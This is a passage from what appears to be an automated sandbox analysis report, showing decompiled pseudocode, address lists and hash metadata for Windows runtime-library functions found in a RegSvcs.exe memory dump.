							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00A56D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00A576E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00AE8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00A4B150();
													}
													_t116 = E00AE6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00A575CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xb38638; // 0x0
																	_t122 = L00A538A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00A576E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00A576E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00A7FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00A570F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00A7FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00A7FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00A7FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00A7FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00A7FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xb37b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xb37b84 = _t75;
						_t73 = E00A5EB70(_t134, 0xb37b60);
						if( *0xb37b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00A5FF60( *0xb37b20);
							}
						}
						goto L5;
					}
				}
			}

0x00a7fab0
0x00a7fab2
0x00a7fab3
0x00a7fab4
0x00a7fabc
0x00a7fac0
0x00a7fb14
0x00a7fb17
0x00a7fac2
0x00a7fac8
0x00a7facd
0x00a7fad3
0x00a7fad3
0x00a7fadd
0x00a7fb18
0x00a7fb1b
0x00a7fb1d
0x00a7fb1e
0x00a7fb1f
0x00a7fb20
0x00a7fb21
0x00a7fb22
0x00a7fb23
0x00a7fb24
0x00a7fb25
0x00a7fb26
0x00a7fb27
0x00a7fb28
0x00a7fb29
0x00a7fb2a
0x00a7fb2b
0x00a7fb2c
0x00a7fb2d
0x00a7fb2e
0x00a7fb2f
0x00a7fb3a
0x00a7fb3b
0x00a7fb3e
0x00a7fb41
0x00a7fb44
0x00a7fb47
0x00a7fb4a
0x00a7fb4d
0x00a7fb53
0x00abbdcb
0x00abbdcb
0x00a7fb59
0x00a7fb5b
0x00a7fb5b
0x00a7fb5e
0x00abbdd5
0x00abbdd8
0x00000000
0x00abbdda
0x00000000
0x00abbdda
0x00a7fb64
0x00a7fb64
0x00a7fb64
0x00a7fb67
0x00a7fb6e
0x00a7fb70
0x00a7fb72
0x00000000
0x00a7fb78
0x00a7fb7a
0x00a7fb7a
0x00a7fb7d
0x00a7fb80
0x00abbddf
0x00abbde1
0x00000000
0x00abbde3
0x00000000
0x00abbde3
0x00a7fb86
0x00a7fb86
0x00a7fb86
0x00a7fb8b
0x00a7fb90
0x00a7fb92
0x00a7fb94
0x00a7fb9a
0x00a7fb9b
0x00a7fba1
0x00abbde8
0x00abbdeb
0x00abbded
0x00abbeb5
0x00abbeb5
0x00abbebb
0x00abbebd
0x00abbec3
0x00abbed2
0x00abbedd
0x00abbedd
0x00abbeed
0x00000000
0x00abbdf3
0x00abbdfe
0x00abbe06
0x00abbe0b
0x00abbe0d
0x00abbe0f
0x00abbe14
0x00abbe19
0x00abbe20
0x00abbe25
0x00abbe27
0x00abbe35
0x00abbe39
0x00abbe46
0x00abbe4f
0x00abbe54
0x00abbe56
0x00abbef8
0x00abbef8
0x00000000
0x00abbe5c
0x00abbe5c
0x00abbe60
0x00000000
0x00abbe66
0x00abbe66
0x00abbe7f
0x00abbe84
0x00abbe87
0x00abbe89
0x00abbe8b
0x00abbe99
0x00abbe9d
0x00abbea0
0x00abbeac
0x00abbeaf
0x00abbeb1
0x00abbeb3
0x00abbeb3
0x00000000
0x00abbea2
0x00abbea2
0x00000000
0x00abbea2
0x00abbe8d
0x00abbe8d
0x00abbe92
0x00000000
0x00abbe92
0x00abbe8b
0x00abbe60
0x00abbe3b
0x00abbe3b
0x00abbe3e
0x00000000
0x00abbe40
0x00abbe40
0x00abbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x00abbe44
0x00abbe3e
0x00abbe29
0x00abbe29
0x00000000
0x00abbe29
0x00abbe27
0x00000000
0x00a7fba7
0x00a7fba7
0x00a7fbab
0x00abbf02
0x00a7fbb1
0x00a7fbb1
0x00a7fbb8
0x00a7fbbd
0x00a7fbbd
0x00a7fbbf
0x00a7fbbf
0x00a7fbc5
0x00a7fbcb
0x00a7fbf8
0x00a7fbf8
0x00a7fbfa
0x00000000
0x00a7fc00
0x00a7fc00
0x00a7fc03
0x00000000
0x00a7fc09
0x00a7fc09
0x00a7fc0f
0x00a7fc15
0x00a7fc23
0x00a7fc23
0x00a7fc25
0x00a7fc27
0x00a7fc75
0x00a7fc7c
0x00a7fc84
0x00000000
0x00a7fc29
0x00a7fc29
0x00a7fc2d
0x00a7fc30
0x00abbf0f
0x00000000
0x00a7fc36
0x00a7fc38
0x00a7fc3b
0x00a7fc41
0x00abbf17
0x00abbf19
0x00abbf48
0x00abbf4b
0x00000000
0x00abbf1b
0x00abbf22
0x00abbf24
0x00abbf26
0x00000000
0x00abbf2c
0x00abbf37
0x00abbf39
0x00abbf3b
0x00000000
0x00abbf41
0x00abbf41
0x00abbf41
0x00abbf41
0x00abbf45
0x00000000
0x00abbf45
0x00abbf3b
0x00abbf26
0x00000000
0x00a7fc47
0x00a7fc47
0x00a7fc49
0x00a7fcb2
0x00a7fcb4
0x00a7fcb6
0x00a7fcdc
0x00a7fcdc
0x00000000
0x00a7fcb8
0x00a7fcc3
0x00a7fcc5
0x00a7fcc7
0x00000000
0x00a7fcc9
0x00a7fcc9
0x00a7fccd
0x00000000
0x00a7fccd
0x00a7fcc7
0x00000000
0x00a7fc4b
0x00a7fc4b
0x00a7fc4e
0x00a7fc4e
0x00a7fc51
0x00a7fc51
0x00a7fc54
0x00a7fc5a
0x00a7fc5c
0x00a7fc5f
0x00a7fc61
0x00a7fc63
0x00a7fc65
0x00a7fc67
0x00a7fc6e
0x00a7fc72
0x00a7fc72
0x00a7fc72
0x00a7fc72
0x00a7fc67
0x00a7fc61
0x00000000
0x00a7fc5a
0x00a7fc49
0x00a7fc41
0x00a7fc30
0x00a7fc27
0x00a7fc03
0x00a7fbcd
0x00a7fbd3
0x00a7fbd9
0x00a7fbdc
0x00a7fbde
0x00a7fc99
0x00a7fc9b
0x00a7fc9d
0x00a7fcd5
0x00a7fcd5
0x00a7fc89
0x00a7fc89
0x00000000
0x00a7fc9f
0x00a7fc9f
0x00a7fca3
0x00000000
0x00a7fca3
0x00000000
0x00a7fbe4
0x00a7fbe4
0x00a7fbe4
0x00a7fbe4
0x00a7fbe9
0x00a7fbf2
0x00000000
0x00a7fbf2
0x00a7fbde
0x00a7fbcb
0x00a7fbab
0x00a7fc8b
0x00a7fc8b
0x00a7fc8c
0x00a7fb80
0x00a7fb72
0x00a7fb5e
0x00a7fc8d
0x00a7fc91
0x00a7fadf
0x00a7fadf
0x00a7fae1
0x00a7fae4
0x00a7fae7
0x00a7faec
0x00a7faf8
0x00a7fb00
0x00a7fb07
0x00a7fb0f
0x00a7fb0f
0x00a7fb07
0x00000000
0x00a7faf8
0x00a7fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00ABBE0F

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 7568bc74e479989022798deff350ba7fca46999266af865bd93458fdede38c48
Instruction ID: 5458860bb5bc8483184fc624844305a0eb9226266e1151cc42c2a06727c80202
Opcode Fuzzy Hash: 7568bc74e479989022798deff350ba7fca46999266af865bd93458fdede38c48
Instruction Fuzzy Hash: 59A1E471B006099FDB26DB68C8507BEB3B8AF44710F14C579E90ADB691EB74DE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A42D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00A42D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0xb35350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0xb37bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E00A897C0();
				}
				if( *0xb379c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0xb379c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E00A71624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E00A67D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00ADFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E00A89520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E00A7E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L00A9DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0xb36901;
								_push(_t109);
								_v52 = _t98;
								if( *0xb36901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E00A89980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E00A895D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E00A67D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E00A67D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00AC7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00ADFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0xb35350;
							if(_t109 != 0xb35350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E00ADFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E00AD5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x00a42d8a
0x00a42d8a
0x00a42d92
0x00a42d96
0x00a42d9e
0x00a42da0
0x00a42da3
0x00a42da5
0x00a42da8
0x00a42dab
0x00a42db2
0x00a9f9aa
0x00a9f9ab
0x00a9f9ae
0x00a9f9ae
0x00a42db8
0x00a42dc2
0x00a9f9b9
0x00a9f9be
0x00a9f9bf
0x00a9f9bf
0x00a42dcf
0x00a9f9c9
0x00a42dd5
0x00a42dd5
0x00a42dd5
0x00a42dde
0x00a42de1
0x00a42e70
0x00a42e72
0x00a42e72
0x00a42de7
0x00a42deb
0x00a42e7c
0x00a42e83
0x00a42e85
0x00a42e8b
0x00a42e8d
0x00a42e92
0x00a42e92
0x00a42e85
0x00a42df1
0x00a42df7
0x00a42df9
0x00a42df9
0x00a42dfc
0x00a42dff
0x00a42e02
0x00000000
0x00a42e05
0x00a42e0c
0x00a9f9d9
0x00a42e12
0x00a42e12
0x00a42e12
0x00a42e1a
0x00a9f9e3
0x00a9f9e9
0x00a9f9f0
0x00a9f9f6
0x00a9f9f8
0x00a9f9f8
0x00a9f9f0
0x00a42e23
0x00a9fa02
0x00a9fa03
0x00a9fa05
0x00a9fa06
0x00000000
0x00a42e29
0x00a42e29
0x00a42e2e
0x00a42e34
0x00a42e3e
0x00000000
0x00000000
0x00a42e44
0x00a42e47
0x00a42e4d
0x00000000
0x00000000
0x00a42e4f
0x00a42e54
0x00000000
0x00000000
0x00a42e5a
0x00a42e5f
0x00a42e9a
0x00a42ea4
0x00a42ea5
0x00a42ea8
0x00a42eaf
0x00a42eb2
0x00a42eb5
0x00a9fae9
0x00a9faeb
0x00a9faed
0x00a9faef
0x00a9faf7
0x00a9faf8
0x00a9fafd
0x00a9faff
0x00a9fb04
0x00a9fb04
0x00a9faff
0x00a42ec0
0x00a42ec4
0x00a42ec6
0x00a42ec8
0x00a9fb14
0x00a9fb18
0x00a9fb1e
0x00a9fb21
0x00a9fb21
0x00a42ece
0x00a42ece
0x00a42ece
0x00a42ed7
0x00a42e61
0x00a42e63
0x00a9fa6b
0x00a9fa71
0x00a9fa76
0x00a9fa78
0x00a9fa8a
0x00a9fa7a
0x00a9fa83
0x00a9fa83
0x00a9fa8f
0x00a9fa91
0x00a9fa97
0x00a9fa9d
0x00a9faa4
0x00a9faaa
0x00a9faaf
0x00a9fab1
0x00a9fac3
0x00a9fab3
0x00a9fabc
0x00a9fabc
0x00a9fac8
0x00a9facb
0x00a9fadf
0x00a9fadf
0x00a9facb
0x00a9faa4
0x00a9fa91
0x00a42e6f
0x00a42e6f
0x00a42e5f
0x00a9fa13
0x00a9fa15
0x00a9fa17
0x00a9fa1f
0x00a9fa21
0x00a9fa22
0x00a9fa25
0x00a9fa28
0x00a9fa2f
0x00a9fa2f
0x00a9fa2a
0x00a9fa2a
0x00a9fa2a
0x00a9fa31
0x00a9fa34
0x00a9fa36
0x00a9fa3c
0x00a9fa3e
0x00a9fa41
0x00a9fa43
0x00a9fa45
0x00a9fa45
0x00a9fa41
0x00a9fa3c
0x00a9fa4a
0x00a9fa4f
0x00a9fa51
0x00a9fa53
0x00a9fa56
0x00a9fa5b
0x00a9fa5e
0x00000000
0x00a9fa5e
0x00a42e23

Strings

RTL: Re-Waiting, xrefs: 00A9FA4A

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 73e401fc6a73825b5c527dbe91ed2ccabdb423228441af46dd064af35656301a
Instruction ID: edc8bc120ded7a7c9552945730b5beb5bab7f759c965b76829701f3add75741e
Opcode Fuzzy Hash: 73e401fc6a73825b5c527dbe91ed2ccabdb423228441af46dd064af35656301a
Instruction Fuzzy Hash: 2F610E31B00604AFDF31DB68C982B7EBBF5EB84764F6406AAF916976C1CB349D008791

Uniqueness

Uniqueness Score: -1.00%

Function 00A452A5 Relevance: 1.4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A452A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E00A5EEF0(0xb379a0);
					_t104 =  *0xb38210; // 0x522c58
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E00A5EB70(_t93, 0xb379a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E00A89890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E00A5EEF0(0xb379a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E00A5EB70(0, 0xb379a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x522c65
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E00A7F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E00A5EEF0(0xb379a0);
									__eflags =  *0xb38210 - _t104; // 0x522c58
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0xb38210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E00AC4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E00A5EB70(_t95, 0xb379a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00A895D0();
											L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00A895D0();
											L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E00A5EB70(_t93, 0xb379a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E00A895D0();
										L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E00A895D0();
										L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E00A7F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x00a452a5
0x00a452ad
0x00a452b0
0x00a452b3
0x00a452b7
0x00a452ba
0x00a452bf
0x00a452c4
0x00a452cc
0x00000000
0x00000000
0x00a452ce
0x00a452d9
0x00a452dd
0x00a452e7
0x00a452f7
0x00a452f9
0x00a452fd
0x00aa0dcf
0x00aa0dd5
0x00aa0dd6
0x00aa0dd7
0x00aa0dd8
0x00aa0dd9
0x00aa0dde
0x00aa0ddf
0x00aa0de0
0x00aa0de1
0x00aa0de2
0x00aa0de5
0x00aa0dea
0x00aa0dec
0x00aa0f60
0x00aa0f64
0x00aa0f70
0x00aa0f76
0x00aa0f79
0x00aa0f79
0x00000000
0x00aa0f64
0x00aa0df2
0x00aa0df7
0x00aa0e04
0x00aa0e0d
0x00aa0e0d
0x00aa0e10
0x00aa0e1a
0x00aa0e1c
0x00aa0e4c
0x00aa0e52
0x00aa0e61
0x00aa0e67
0x00aa0e6b
0x00aa0e70
0x00aa0e76
0x00aa0ed7
0x00aa0edc
0x00aa0ee0
0x00aa0ee6
0x00aa0eea
0x00aa0eed
0x00aa0ef0
0x00aa0ef3
0x00aa0ef6
